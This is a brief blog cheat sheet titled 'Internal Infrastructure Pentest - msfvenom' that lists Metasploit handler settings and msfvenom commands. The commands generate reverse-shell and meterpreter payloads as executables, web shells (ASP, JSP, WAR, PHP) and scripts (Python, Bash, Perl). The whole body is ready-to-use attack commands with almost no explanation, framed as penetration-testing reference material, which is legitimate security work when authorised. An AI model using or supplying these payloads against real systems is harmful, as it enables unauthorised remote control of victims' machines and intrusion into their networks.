Internal Infrastructure Pentest - msfvenom

less than 1 minute read

 Handler on Msfconsole 
  - use exploit/multi/handler
  - set PAYLOAD windows/meterpreter/reverse_tcp
  - set LHOST localhost
  - set LPORT 4444
  - set ExitOnSession false
  - exploit -j -z

 Payload creation with Direct Access to OS 
- Windows:
  - msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe
  
- Linux:
  - msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > payload.elf
  
- Mac:
  - msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > payload.macho

 Payload creation to exploit through web

- ASP:
  - msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > payload.asp
  
- JSP:
  - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f jsp > payload.jsp
  
- WAR:
  - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > payload.war

- PHP:
  - msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
  
 Payload creation to exploit via scripting
  
- Python:
  - msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

- Bash:

  - msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

- Perl:
  - msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

</pre>

Share on

Twitter Facebook LinkedIn

Viral Maniar

Internal Infrastructure Pentest - msfvenom

Share on

You may also enjoy

Destroying Cloud Infrastructure with Nuking Tools - LAPSUS$ Case Study

Installing Kali in AWS EC2 Instance

Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket

The Power of In-Memory Executions: How to Execute Code without Touching Disk